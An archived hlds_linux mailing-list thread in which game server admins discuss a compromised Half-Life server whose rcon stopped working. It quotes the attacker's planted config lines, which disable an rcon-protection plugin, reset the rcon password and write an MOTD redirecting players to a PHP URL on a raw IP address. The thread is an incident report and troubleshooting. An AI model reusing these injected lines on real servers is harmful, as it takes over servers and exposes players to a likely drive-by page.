You can still upload arbitrary files to anywhere on any system running
SRCDS. Since the exploit seems to have originated from Quake, was this ever
fixed/addressed in HLDS (if it does exist)? I seem to remember seeing a
plugin that helped fix this for CS1.5.

Thanks,
Kyle.


On Thu, Jan 3, 2013 at 1:08 PM, Eli Witt <[email protected]> wrote:

> It's pretty much certain that he's got an AMX plugin with a security hole
> in it.
>
>
>
> On Thu, Jan 3, 2013 at 8:10 AM, Bjorn Wielens <[email protected]> wrote:
>
> > Interesting. I was under the impression that RCON can't make permanent
> > server config changes (i.e. write to config files) - I thought it was
> > only limited to being able to change current cvars in memory, which would
> > be wiped the next time a config changes them.
> >
> > Have I got that wrong?
> >
> > If not, I'd suspect the attack vector is probably not via RCON... more
> > likely an exploit via a file upload mechanism or so (sprays?) to get the
> > malicious .cfg there in the first place.
> > Sadly the redirected URL doesn't respond for me, so I can't take a look
> > and see what they were attempting to do with it. (more than likely a
> > drive-by malware install or something).
> >
> > ________________________________
> >  From: Collin Howard <[email protected]>
> > To: Half-Life dedicated Linux server mailing list <
> > [email protected]>
> > Sent: Wednesday, January 2, 2013 3:23:33 PM
> > Subject: Re: [hlds_linux] Remote connection with rcon
> >
> > Looks like there might be a new exploit or hack. Somehow, someone was able
> > to create a maps folder in my amxmodx config folder and create map specific
> > cfg files and added the following lines to it:
> >
> > amxx pause rcon_defencer.amxx
> > rcon_password "56425642"
> > motdfile motd.txt
> > motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=
> > http://78.110.63.117//abunaimo.php?jecttely=674660";>
> >
> > I don't use ftp on the box, only access to the box is via ssh and the ssh
> > port is a completely random port and the password is 25+ character
> > completely random password. So I don't think anyone could have gained
> > access to the box directly to do this. Is there a known exploit or hack
> > that does this? This was done with only one HLDS setup on the box while
> > the other HLDS setups were not affected. These files are what were causing
> > my issue of not being able to remotely connect with the rcon specified in
> > server.cfg
> >
> >
> > ________________________________
> > From: Ken Bateman <[email protected]>
> > To: Collin Howard <[email protected]>; Half-Life dedicated Linux server
> > mailing list <[email protected]>
> > Sent: Tuesday, January 1, 2013 1:43:32 AM
> > Subject: Re: [hlds_linux] Remote connection with rcon
> >
> > On Tue, Jan 1, 2013 at 1:15 AM, Collin Howard <[email protected]> wrote:
> >
> > > From the looks of it, server.cfg is not automatically executing when the
> > > map changes and even when I restart the hlds. Anyone have a clue on what's
> > > going on? Doing exec server.cfg in console executed the config file and
> > > rcon started working. Any ideas?
> > >
> >
> > Is servercfgfile set to "server.cfg"?  Is it being set to something
> > different on the command line or in autoexec.cfg?
> >
> > -Ken
> > _______________________________________________
> > To unsubscribe, edit your list preferences, or view the list archives,
> > please visit:
> > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
